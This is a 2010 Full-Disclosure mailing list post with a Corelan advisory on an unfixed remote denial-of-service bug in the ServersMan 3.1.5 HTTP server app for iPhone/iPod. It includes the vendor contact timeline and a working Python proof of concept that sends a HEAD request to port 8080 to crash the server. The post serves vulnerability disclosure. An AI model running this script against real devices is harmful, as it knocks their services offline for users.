[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DoS exploit

To: <full-disclosure@xxxxxxxxxxxxxxxxx>, <secalert@xxxxxxxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>, <vuln@xxxxxxxxxxx>
Subject: [Full-disclosure] Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DoS exploit
From: Steven Seeley <seeleymagic@xxxxxxxxxxx>
Date: Wed, 27 Jan 2010 21:27:17 +1100

Kind regards,

mr_me
                                          
_________________________________________________________________
Video chat with Windows Live Messenger Learn how
http://windowslive.ninemsn.com.au/messenger/article/870686/video-chat-with-messenger

|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                              security@xxxxxxxxxx |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
|                                                                  |
|                 Vulnerability Disclosure Report                  |
|                                                                  |
|------------------------------------------------------------------|

Advisory        : CORELAN-10-005
Disclosure date : 27th Jan 2010


0x00 : Vulnerability information
--------------------------------

[*] Product : Apple Iphone/Ipod - Serversman HTTP Server
[*] Version : 3.1.5 
[*] Vendor : ServersMan
[*] URL : http://serversman.com/index_en.jsp
[*] Platform : Darwin osx (Iphone) 3G
[*] Type of vulnerability : Remote DoS
[*] Risk rating : Low
[*] Issue fixed in version : <unfixed>
[*] Vulnerability discovered by : mr_me
[*] Greetings to : corelanc0d3r, EdiStrosar, rick2600, ekse, MarkoT, sinn3r & 
Jacky from Corelan Team


0x01 : Vendor description of software
-------------------------------------
From the vendor website:

Share your files with friends via ServerMan. Use your iPhone, iPod Touch or 
Windows Mobile as a web server. Publish audio, pictures, your current location.


0x02 : Vulnerability details
----------------------------
The vulnerability can be triggered by using a HTTP 'head' request to access the 
default web root '/' on the device. 




0x03 : Vendor communication
---------------------------
[*] January 3, 2010 - Initial contact
[*] January 4, 2010 - Vendor replied requesting PoC code
[*] January 4, 2010 - Provided vendor with PoC
[*] January 11, 2010 - Requested patch date and confirmation of vulnerability
[*] January 12, 2010 - Received confirmation of vulnerability
[*] January 24, 2010 - Contacted vendor for patch date
[*] January 27, 2010 - No response from vendor

0x04 : Exploit/PoC
------------------
#!/usr/bin/python
#
# Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DoS exploit
# Found by: Steven Seeley (mr_me) seeleymagic [at] hotmail [dot] com
# Homepage: http://serversman.com/index_en.jsp
# Download: From the app store (use your itunes account)
# Tested on: Iphone 3G - firmware 3.1.2 (Darwin kernel)
# Greetz to: corelanc0d3r, EdiStrosar, rick2600, ekse, MarkoT, sinn3r & Jacky 
from Corelan Team
# Special Greetz to TecR0c!

print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                              security@xxxxxxxxxx |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DOS exploit"

import socket
import sys

def Usage():
    print ("Usage: ./serversman.py <serv_ip>\n")
    print ("Example: ./serversman.py 192.168.48.183\n")
if len(sys.argv) <> 2:
        Usage()
        sys.exit(1)
else:
    hostname = sys.argv[1]
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 8080))
        print "[+] Connecting to the target.."
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    print "[+] Sending payload.. muhaha ph33r"
    sock.send("HEAD / HTTP/1.0\r\n\r\n")
    r=sock.recv(1024)
    sock.close()
    print "[+] HTTP Server is now DoSed!"
    sys.exit(0);

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Disk wiping -- An alternate approach?
Next by Date: [Full-disclosure] how to use robtex for fun
Previous by thread: [Full-disclosure] PR09-02 Multiple Cross-Site Scripting (XSS) / Cross Domain redirects and Server path information disclosure on SAP BusinessObjects version 12
Next by thread: [Full-disclosure] how to use robtex for fun
Index(es):
- Date
- Thread